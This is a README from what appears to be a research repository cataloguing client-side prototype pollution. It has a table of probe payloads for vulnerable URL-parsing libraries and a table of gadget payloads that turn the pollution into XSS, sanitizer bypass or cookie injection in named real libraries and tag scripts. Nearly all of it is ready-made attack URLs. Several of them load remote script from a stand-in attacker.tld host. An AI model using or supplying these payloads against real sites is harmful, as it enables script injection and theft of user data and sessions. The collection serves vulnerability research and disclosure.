If you are unfamiliar with Prototype Pollution attacks, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski
In this repository, I am collecting examples of libraries that are vulnerable to Prototype Pollution through their parsing of `document.location` (the query string or the fragment), together with useful script gadgets that can be used to demonstrate the impact of such pollution. The first table lists the vulnerable parsers with probe payloads that only confirm that `Object.prototype` was polluted; the second table lists the gadgets and the impact each one yields.
Name | Payload | Refs | Found by |
---|---|---|---|
Wistia Embedded Video (Fixed) | ?__proto__[test]=test ?__proto__.test=test |
[1] | William Bowling |
jQuery query-object plugin CVE-2021-20083 |
?__proto__[test]=test #__proto__[test]=test |
Sergey Bobrov | |
jQuery Sparkle CVE-2021-20084 |
?__proto__.test=test ?constructor.prototype.test=test |
Sergey Bobrov | |
V4Fire Core Library | ?__proto__.test=test ?__proto__[test]=test ?__proto__[test]={"json":"value"} |
Sergey Bobrov | |
backbone-query-parameters CVE-2021-20085 |
?__proto__.test=test ?constructor.prototype.test=test ?__proto__.array=1|2|3 |
[1] | Sergey Bobrov |
jQuery BBQ CVE-2021-20086 |
?__proto__[test]=test ?constructor[prototype][test]=test |
Sergey Bobrov | |
jquery-deparam CVE-2021-20087 |
?__proto__[test]=test ?constructor[prototype][test]=test |
Sergey Bobrov | |
MooTools More CVE-2021-20088 |
?__proto__[test]=test ?constructor[prototype][test]=test |
Sergey Bobrov | |
Swiftype Site Search (Fixed) | #__proto__[test]=test |
[1] | s1r1us |
CanJS deparam | ?__proto__[test]=test ?constructor[prototype][test]=test |
Rahul Maini | |
Purl (jQuery-URL-Parser) CVE-2021-20089 |
?__proto__[test]=test ?constructor[prototype][test]=test #__proto__[test]=test |
Sergey Bobrov | |
HubSpot Tracking Code (Fixed) | ?__proto__[test]=test ?constructor[prototype][test]=test #__proto__[test]=test |
Sergey Bobrov | |
YUI 3 querystring-parse | ?constructor[prototype][test]=test |
Sergey Bobrov | |
Mutiny (Fixed) | ?__proto__.test=test |
SPQR | |
jQuery parseParams | ?__proto__.test=test ?constructor.prototype.test=test |
POSIX | |
php.js parse_str | ?__proto__[test]=test ?constructor[prototype][test]=test |
POSIX | |
arg.js | ?__proto__[test]=test ?__proto__.test=test ?constructor[prototype][test]=test #__proto__[test]=test |
POSIX | |
davis.js | ?__proto__[test]=test |
POSIX | |
Component querystring | ?__proto__[NUMBER]=test ?__proto__[123]=test |
Masato Kinugawa | |
Aurelia path | ?__proto__[test]=test |
[1] | s1r1us |
analytics-utils < 1.0.3 | ?__proto__[test]=test ?constructor[prototype][test]=test |
[1] | alexdaviestray |
Name | Payload | Impact | Refs | Found by |
---|---|---|---|---|
Wistia Embedded Video | ?__proto__[innerHTML]=<img/src/onerror%3dalert(1)> |
XSS | [1] | William Bowling |
jQuery $.get | ?__proto__[context]=<img/src/onerror%3dalert(1)> &__proto__[jquery]=x |
XSS | Sergey Bobrov | |
jQuery $.get >= 3.0.0 Boolean.prototype |
?__proto__[url][]=data:,alert(1)// &__proto__[dataType]=script |
XSS | Michał Bentkowski | |
jQuery $.get >= 3.0.0 Boolean.prototype |
?__proto__[url]=data:,alert(1)// &__proto__[dataType]=script &__proto__[crossDomain]= |
XSS | Sergey Bobrov | |
jQuery $.getScript >= 3.4.0 | ?__proto__[src][]=data:,alert(1)// |
XSS | s1r1us | |
jQuery $.getScript 3.0.0 - 3.3.1 Boolean.prototype |
?__proto__[url]=data:,alert(1)// |
XSS | s1r1us | |
jQuery $(html) | ?__proto__[div][0]=1 &__proto__[div][1]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
jQuery $(x).off String.prototype |
?__proto__[preventDefault]=x &__proto__[handleObj]=x &__proto__[delegateTarget]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Google reCAPTCHA | ?__proto__[srcdoc][]=<script>alert(1)</script> |
XSS | s1r1us | |
Twitter Universal Website Tag | ?__proto__[hif][]=javascript:alert(1) |
XSS | Sergey Bobrov | |
Tealium Universal Tag | ?__proto__[attrs][src]=1 &__proto__[src]=data:,alert(1)// |
XSS | Sergey Bobrov | |
Akamai Boomerang | ?__proto__[BOOMR]=1 &__proto__[url]=//attacker.tld/js.js |
XSS | s1r1us | |
Lodash <= 4.17.15 | ?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1) |
XSS | [1] | Alex Brasetvik |
sanitize-html | ?__proto__[*][]=onload |
Bypass | [1] | Michał Bentkowski |
sanitize-html | ?__proto__[innerText]=<script>alert(1)</script> |
Bypass | [1] | Hpdoger |
js-xss | ?__proto__[whiteList][img][0]=onerror &__proto__[whiteList][img][1]=src |
Bypass | [1] | Michał Bentkowski |
DOMPurify <= 2.0.12 | ?__proto__[ALLOWED_ATTR][0]=onerror &__proto__[ALLOWED_ATTR][1]=src |
Bypass | [1] | Michał Bentkowski |
DOMPurify <= 2.0.12 | ?__proto__[documentMode]=9 |
Bypass | [1] | Michał Bentkowski |
Google Closure | ?__proto__[*%20ONERROR]=1 &__proto__[*%20SRC]=1 |
Bypass | [1] | Michał Bentkowski |
Google Closure | ?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)// |
XSS | [1] | Michał Bentkowski |
Marionette.js / Backbone.js | ?__proto__[tagName]=img &__proto__[src][]=x: &__proto__[onerror][]=alert(1) |
XSS | Sergey Bobrov | |
Adobe Dynamic Tag Management | ?__proto__[src]=data:,alert(1)// |
XSS | Sergey Bobrov | |
Adobe Dynamic Tag Management | ?__proto__[SRC]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Swiftype Site Search | ?__proto__[xxx]=alert(1) |
XSS | s1r1us | |
Embedly Cards | ?__proto__[onload]=alert(1) |
XSS | Guilherme Keerok | |
Segment Analytics.js | ?__proto__[script][0]=1 &__proto__[script][1]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Knockout.js Array.prototype |
?__proto__[4]=a':1,[alert(1)]:1,'b &__proto__[5]=, |
XSS | Michał Bentkowski | |
Zepto.js | ?__proto__[onerror]=alert(1) |
XSS | [1] | lih3iu |
Zepto.js | ?__proto__[html]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
Sprint.js | ?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)> |
XSS | [1] | lih3iu |
Vue.js | ?__proto__[v-if]=_c.constructor('alert(1)')() |
XSS | POSIX | |
Vue.js | ?__proto__[attrs][0][name]=src &__proto__[attrs][0][value]=xxx &__proto__[xxx]=data:,alert(1)// &__proto__[is]=script |
XSS | [1] | s1r1us |
Vue.js | ?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')() |
XSS | [1] | r00timentary |
Vue.js | ?__proto__[data]=a &__proto__[template][nodeType]=a &__proto__[template][innerHTML]=<script>alert(1)</script> |
XSS | [1] | SuperGuesser |
Vue.js | ?__proto__[props][][value]=a &__proto__[name]=":''.constructor.constructor('alert(1)')()," |
XSS | [1] | st98_ |
Vue.js | ?__proto__[template]=<script>alert(1)</script> |
XSS | [1] | huli |
Demandbase Tag | ?__proto__[Config][SiteOptimization][enabled]=1 &__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php? |
XSS | SPQR | |
@analytics/google-tag-manager | ?__proto__[customScriptSrc]=//attacker.tld/xss.js |
XSS | SPQR | |
i18next | ?__proto__[lng]=cimode &__proto__[appendNamespaceToCIMode]=x &__proto__[nsSeparator]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
i18next < 19.8.5 | ?__proto__[lng]=a &__proto__[a]=b &__proto__[obj]=c &__proto__[k]=d &__proto__[d]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
i18next >= 19.8.5 | ?__proto__[lng]=a &__proto__[key]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
Google Analytics | ?__proto__[cookieName]=COOKIE%3DInjection%3B |
Cookie Injection | Sergey Bobrov | |
Popper.js | ?__proto__[arrow][style]=color:red;transition:all%201s &__proto__[arrow][ontransitionend]=alert(1) ?__proto__[reference][style]=color:red;transition:all%201s &__proto__[reference][ontransitionend]=alert(2) ?__proto__[popper][style]=color:red;transition:all%201s &__proto__[popper][ontransitionend]=alert(3) |
XSS | [1] [2] | Matheus Vrech |
Pendo Agent | ?__proto__[dataHost]=attacker.tld/js.js%23 |
XSS | Renwa | |
script.aculo.us String.constructor |
?x=x &x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
hCaptcha (Fixed) | ?__proto__[assethost]=javascript:alert(1)// |
XSS | Masato Kinugawa | |
Google Closure | ?__proto__[trustedTypes]=x &__proto__[emptyHTML]=<img/src/onerror%3dalert(1)> |
XSS | Mathias Karlsson | |
Google Tag Manager | ?__proto__[vtp_enableRecaptcha]=1 &__proto__[srcdoc]=<script>alert(1)</script> |
XSS | terjanq | |
Google Tag Manager | ?__proto__[q][0][0]=require &__proto__[q][0][1]=x &__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 |
XSS | Sergey Bobrov / Masato Kinugawa |
|
Google Analytics | ?__proto__[q][0][0]=require &__proto__[q][0][1]=x &__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 |
XSS | Sergey Bobrov / Masato Kinugawa |